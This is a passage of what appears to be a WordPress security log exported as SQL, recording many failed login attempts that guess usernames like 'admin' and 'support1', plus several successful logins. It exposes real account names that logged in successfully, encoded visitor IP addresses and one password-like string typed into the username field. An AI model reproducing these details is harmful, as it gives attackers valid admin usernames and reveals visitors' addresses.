Safari/537.36'),(18655,111339,1692001140.933484,1,'loginFailInvalidUsername','f-admin',0,0x00000000000000000000FFFFAC6E941B,'Mozilla/5.0 (Linux; Android 11; moto g fast) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18656,111346,1692017096.209033,1,'loginFailInvalidUsername','manish',0,0x00000000000000000000FFFF287AEC11,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18657,111347,1692017096.627955,1,'loginFailInvalidUsername','manish',0,0x00000000000000000000FFFF287AEC11,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18740,111674,1692196720.939144,1,'loginFailInvalidUsername','developer001',0,0x00000000000000000000FFFF26822130,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-S205DL) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18741,111675,1692196726.918624,1,'loginFailInvalidUsername','matt777',0,0x00000000000000000000FFFFDEFD96AF,'Mozilla/5.0 (Linux; Android 11; SM-G781U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18742,111676,1692196729.291936,1,'loginFailInvalidUsername','support1',0,0x00000000000000000000FFFFDEFEABFD,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15'),(18743,111677,1692196730.743589,1,'loginFailInvalidUsername','support2',0,0x00000000000000000000FFFFC1CBD1FE,'Mozilla/5.0 (Linux; Android 11; SM-N981U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18744,111678,1692196743.234476,1,'loginFailInvalidUsername','support4',0,0x00000000000000000000FFFFAA4FCB15,'Mozilla/5.0 (Linux; Android 7.0; LG-V530) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36'),(18745,111679,1692196746.941494,1,'loginFailInvalidUsername','support5',0,0x00000000000000000000FFFFCA4ECE82,'Mozilla/5.0 (Linux; Android 11; SM-A515U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18432,109452,1691377370.085671,1,'loginFailInvalidUsername','wrathion',0,0x00000000000000000000FFFFD59BA0E3,'Mozilla/5.0 (Linux; Android 11; REVVL V+ 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18433,109470,1691405265.882888,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFB91D0DAF,'Mozilla/5.0 (Linux; Android 12; SM-N986U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.75 Mobile Safari/537.36'),(18434,109471,1691405296.648758,1,'loginFailInvalidUsername','durotan',0,0x00000000000000000000FFFF0EB1E3F0,'Mozilla/5.0 (Linux; Android 9; U304AA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18435,109472,1691405300.360623,1,'loginFailInvalidUsername','blackhand',0,0x00000000000000000000FFFFBD326191,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1'),(18436,109473,1691405303.504644,1,'loginFailInvalidUsername','rexxar',0,0x00000000000000000000FFFF67BE5BFE,'Mozilla/5.0 (Linux; Android 10; SM-N960W) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36'),(18437,109474,1691405305.935946,1,'loginFailInvalidUsername','chen',0,0x00000000000000000000FFFF0EA1043D,'Mozilla/5.0 (Linux; Android 11; motorola one 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18438,109475,1691405307.524116,1,'loginFailInvalidUsername','admin777',0,0x00000000000000000000FFFF0EE2DECF,'Mozilla/5.0 (Linux; Android 10; SM-G965U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(20124,134815,1700296123.518071,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFB4F291ED,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0'),(20123,134814,1700295432.802285,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF23D10949,'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(20121,134806,1700290554.256025,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF8D5F0B35,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(20122,134807,1700292985.582066,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF44B2A3DC,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(20119,134803,1700285749.763138,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF50960696,'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(20120,134804,1700288149.461627,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFA763AF5B,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(20118,134799,1700283338.209904,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF334D4254,'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(20117,134796,1700280912.987492,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF8B3BA6E9,'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(20116,134795,1700278476.519841,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF327466D3,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(20115,134794,1700276026.449653,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF671BEEFB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(20206,134969,1700484620.622597,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF293A3B8A,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(20205,134961,1700466286.696482,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF80C75146,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(20204,134960,1700466285.581775,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF80C75146,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(20203,134959,1700466284.465914,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF80C75146,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(20201,134941,1700441426.937389,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF36EB0A6B,'Mozilla/5.0'),(20202,134948,1700446341.184647,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF3A88C79E,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(20199,134939,1700439281.432794,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF36EB0A6B,'Mozilla/5.0'),(20200,134939,1700439281.435690,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF36EB0A6B,'Mozilla/5.0'),(20197,134935,1700435114.395219,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF36EB0A6B,'Mozilla/5.0'),(20198,134936,1700437189.754056,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF36EB0A6B,'Mozilla/5.0'),(20195,134933,1700431516.382775,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF36EB0A6B,'Mozilla/5.0'),(20196,134934,1700433123.382040,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF36EB0A6B,'Mozilla/5.0'),(20194,134932,1700425273.620145,1,'loginFailInvalidUsername','reina',0,0x00000000000000000000FFFFB33C9378,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(20193,134931,1700425272.820975,1,'loginFailInvalidUsername','reina',0,0x00000000000000000000FFFFB33C9378,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(20192,134930,1700425272.075368,1,'loginFailInvalidUsername','reina',0,0x00000000000000000000FFFFB33C9378,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(18287,108040,1691141799.489997,1,'loginFailInvalidUsername','supp',0,0x00000000000000000000FFFFBEBB5E93,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36'),(18288,108041,1691141801.960206,1,'loginFailInvalidUsername','admin-3',0,0x00000000000000000000FFFFB36C398B,'Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36'),(18289,108042,1691141803.550839,1,'loginFailInvalidUsername','admin-4',0,0x00000000000000000000FFFF2522657A,'Mozilla/5.0 (Linux; Android 11; SM-G981V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Mobile Safari/537.36'),(18290,108043,1691141805.162313,1,'loginFailInvalidUsername','admin-5',0,0x00000000000000000000FFFFC1CBD1F9,'Mozilla/5.0 (Linux; Android 11; SM-A526U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18291,108046,1691147448.940978,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFD4F4784C,'Mozilla/5.0 (Linux; Android 12; SM-G998U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18292,108047,1691147450.800410,1,'loginFailInvalidUsername','administrator1',0,0x00000000000000000000FFFF18700E37,'Mozilla/5.0 (iPad; CPU OS 15_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/96.0.4664.116 Mobile/15E148 Safari/604.1'),(18293,108048,1691147452.882088,1,'loginFailInvalidUsername','blogadmin1',0,0x00000000000000000000FFFFC26E0330,'Mozilla/5.0 (Linux; Android 10; 5007Z) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18294,108049,1691147454.150800,1,'loginFailInvalidUsername','blog',0,0x00000000000000000000FFFF2D4FCBFE,'Mozilla/5.0 (Linux; Android 10; LGL555DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18295,108050,1691147457.413207,1,'loginFailInvalidUsername','supp',0,0x00000000000000000000FFFF7184DCC1,'Mozilla/5.0 (Linux; Android 11; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18296,108051,1691147461.456957,1,'loginFailInvalidUsername','admin-3',0,0x00000000000000000000FFFF0EF1F6E0,'Mozilla/5.0 (Linux; Android 11; SM-S115DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18297,108052,1691147463.635028,1,'loginFailInvalidUsername','admin-4',0,0x00000000000000000000FFFFB91023DA,'Mozilla/5.0 (Linux; Android 11; SM-N970U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18298,108053,1691147466.262373,1,'loginFailInvalidUsername','admin-5',0,0x00000000000000000000FFFF298BF643,'Mozilla/5.0 (Linux; Android 11; SM-G975U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18299,108068,1691154540.752842,0,'loginOK','john-admin-96',15,0x00000000000000000000FFFFB860BADB,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18300,108071,1691162176.724647,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18405,109418,1691348645.254203,1,'loginFailInvalidUsername','username',0,0x00000000000000000000FFFFC85299D7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18406,109419,1691348665.235995,1,'loginFailInvalidUsername','Password!',0,0x00000000000000000000FFFF55F283A6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(20161,134885,1700374406.049058,1,'loginFailInvalidUsername','sbayart',0,0x00000000000000000000FFFF67F14254,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(20160,134884,1700374405.086687,1,'loginFailInvalidUsername','sbayart',0,0x00000000000000000000FFFF67F14254,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(20159,134883,1700374404.266833,1,'loginFailInvalidUsername','sbayart',0,0x00000000000000000000FFFF67F14254,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(20158,134882,1700374403.434893,1,'loginFailInvalidUsername','sbayart',0,0x00000000000000000000FFFF67F14254,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(20133,134847,1700323798.580587,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFD2CF5C18,'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(20132,134846,1700321327.385378,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFA123DA9D,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(20131,134843,1700318857.440260,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF43CD0C92,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(20130,134843,1700318857.436790,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF43CD0C92,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(20129,134834,1700316380.252018,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFB8A81F24,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(20128,134820,1700300382.754354,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFA290644D,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(20127,134817,1700299625.129717,1,'loginFailInvalidUsername','plesk_administrator',0,0x00000000000000000000FFFF68F44BF3,'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),(20126,134816,1700297902.730323,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF905B692C,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(20125,134816,1700297902.727119,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF905B692C,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(19761,131599,1699312437.635887,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF679ECEA7,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(19760,131597,1699304933.024113,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF8B3BA6E9,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(19759,131596,1699304390.131778,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF45A3CBB9,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(19758,131595,1699297428.074834,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF5E173DA5,'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(19757,131594,1699296892.118945,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFDD786787,'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(19756,131593,1699290337.998692,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF5BEEA4AC,'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(19755,131592,1699289841.371589,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFA2F06863,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(19819,131660,1699337345.059604,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19820,131661,1699337993.526959,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19741,131529,1699206026.870344,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19742,131530,1699208414.773307,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19743,131530,1699208414.776099,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19744,131531,1699210800.573374,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19745,131578,1699257429.064955,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF08DB33B7,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(19746,131579,1699257783.096211,1,'loginFailInvalidUsername','plesk_administrator',0,0x00000000000000000000FFFFD18D2E63,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9'),(19747,131580,1699258082.509770,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF96E61B7A,'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(19748,131583,1699263493.272973,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2765B9BA,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(19749,131584,1699264140.085859,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF1761CDD2,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(19750,131585,1699269546.654569,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFA7AC42BD,'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(19751,131586,1699270183.399511,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF45A3CBB9,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(19752,131587,1699276512.664599,1,'loginFailInvalidUsername','wadminw',0,0x00000000000000000000FFFF23BB3A88,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(19753,131588,1699277166.661140,1,'loginFailInvalidUsername','wadminw',0,0x00000000000000000000FFFF334D35CA,'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(19754,131590,1699282189.173906,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2F6F742C,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(19815,131656,1699335422.055648,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19816,131657,1699335707.524696,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF334D4254,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(19817,131658,1699336066.649724,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19818,131659,1699336704.132682,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19740,131528,1699203638.433136,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19739,131527,1699202020.174014,1,'loginFailInvalidUsername','wwwadmin',0,0x00000000000000000000FFFF8F6EB100,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(19737,131526,1699201267.599311,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19738,131527,1699202020.169690,1,'loginFailInvalidUsername','wwwadmin',0,0x00000000000000000000FFFF8F6EB100,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(19814,131655,1699334794.115018,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19793,131632,1699330394.887287,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19794,131633,1699330395.211801,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19795,131634,1699330395.535231,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19796,131635,1699330395.859795,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19797,131636,1699331295.548855,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19798,131637,1699331295.899797,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19799,131638,1699331296.238983,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19800,131639,1699331296.589305,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19801,131640,1699331296.941233,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19802,131641,1699331297.278851,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19803,131642,1699331297.615809,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19804,131643,1699331297.960129,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19805,131644,1699331298.305702,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19806,131645,1699331298.642519,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19807,131646,1699331298.971532,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19808,131647,1699332282.255193,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19809,131648,1699332692.013375,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF145C8A39,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(19810,131651,1699332905.309455,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19811,131652,1699332941.809407,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFD90B307E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(19812,131653,1699333536.431379,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19813,131654,1699334164.408060,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19978,134264,1699999460.683824,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(19977,134254,1699995498.835314,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(19980,134338,1700066153.590482,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 